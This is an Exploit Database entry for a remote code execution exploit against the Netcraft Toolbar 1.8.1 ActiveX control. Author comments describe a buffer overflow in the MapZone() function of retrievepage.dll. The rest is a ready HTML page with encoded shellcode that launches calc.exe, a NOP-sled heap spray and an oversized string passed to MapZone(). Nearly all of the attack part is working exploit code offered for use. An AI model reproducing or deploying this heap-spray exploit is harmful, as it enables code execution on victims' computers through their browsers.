Netcraft Toolbar 1.8.1 – Remote Code Execution

• Exploit Database
• 10 阅读

• 作者： Rew
  日期： 2010-11-23
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/15600/

• <!-- 
  
  Title: Netcraft Toolbar 1.8.1 Remote Code Execution Exploit
  Date: Nov 23, 2010
  Author: Rew
  Email: rew [splat] leethax.info 
  Link: http://toolbar.netcraft.com/install/Netcraft%20Toolbar.msi
  Version: 1.8.1
  Tested on: WinXP - IE 6
  CVE: NA (0day)
  
  This object is NOT marked safe for scripting so the impact of this issue is small.You'll have to
  enable loading of unsafe ActiveX controls to be able to test it.
  
  There is a classic buffer overflow in "%PROGRAMFILES%\Netcraft Toolbar\retrievepage.dll".
  By supplying an overly long string to the MapZone() function we can blah blah blah... this
  has been covered 10000000 times.Our offset is... [75 junk bytes][ebp][eip].l33th4x iknowright.
  
  NOTE:
  This issue appears to get patched silently after the Netcraft Toolbar loads up in IE.retrievepage.dll
  gets replaced however curiously, both the old and new dlls have the SAME version number (1.0.1.0), and
  there is no indication an update has occured.Maybe Netcraft is trying to hide the vulnerability?
  I dont know.The vulnerable dll is 180KB whereas the patched one is 172KB.Meh, just fyi.Make sure
  it's loading the 180KB one when testing.
  
  much love to irc.rizon.net#beer
  
  PS:
  Any Information Security firms looking for a knowledgeable, motivated intern?
  I sure would love to talk to you.
  
  -->
  
  <object classid='clsid:73F57628-B458-11D4-9673-00A0D212FC63' id='target' /></object>
  
  <script>
  
  // runs calc.exe
  var shellcode = unescape(
  	'%uc931%ue983%ud9de%ud9ee%u2474%u5bf4%u7381%u3d13%u5e46%u8395'+
  	'%ufceb%uf4e2%uaec1%u951a%u463d%ud0d5%ucd01%u9022%u4745%u1eb1'+
  	'%u5e72%ucad5%u471d%udcb5%u72b6%u94d5%u77d3%u0c9e%uc291%ue19e'+
  	'%u873a%u9894%u843c%u61b5%u1206%u917a%ua348%ucad5%u4719%uf3b5'+
  	'%u4ab6%u1e15%u5a62%u7e5f%u5ab6%u94d5%ucfd6%ub102%u8539%u556f'+
  	'%ucd59%ua51e%u86b8%u9926%u06b6%u1e52%u5a4d%u1ef3%u4e55%u9cb5'+
  	'%uc6b6%u95ee%u463d%ufdd5%u1901%u636f%u105d%u6dd7%u86be%uc525'+
  	'%u3855%u7786%u2e4e%u6bc6%u48b7%u6a09%u25da%uf93f%u465e%u955e'
  );
  
  var nops = unescape('%u9090%u9090');
  var headersize = 20;
  var slackspace = headersize + shellcode.length;
  
  while(nops.length < slackspace) {
  	nops += nops;
  }
  
  var fillblock = nops.substring(0, slackspace);
  var block = nops.substring(0, nops.length - slackspace);
  
  while((block.length + slackspace) < 0x50000) {
  	block = block + block + fillblock;
  }
  
  // Do a little dance...
  memory=new Array();
  for(counter=0; counter<200; counter++){
  	memory[counter] = block + shellcode;
  } 
  
  // Make a little love...
  var pwnt = "";
  while(pwnt.length <= 83){
  	pwnt += "\x0c";
  }
  
  
  // Get down tonight!
  document.getElementById('target').MapZone( pwnt ); 
  
  </script>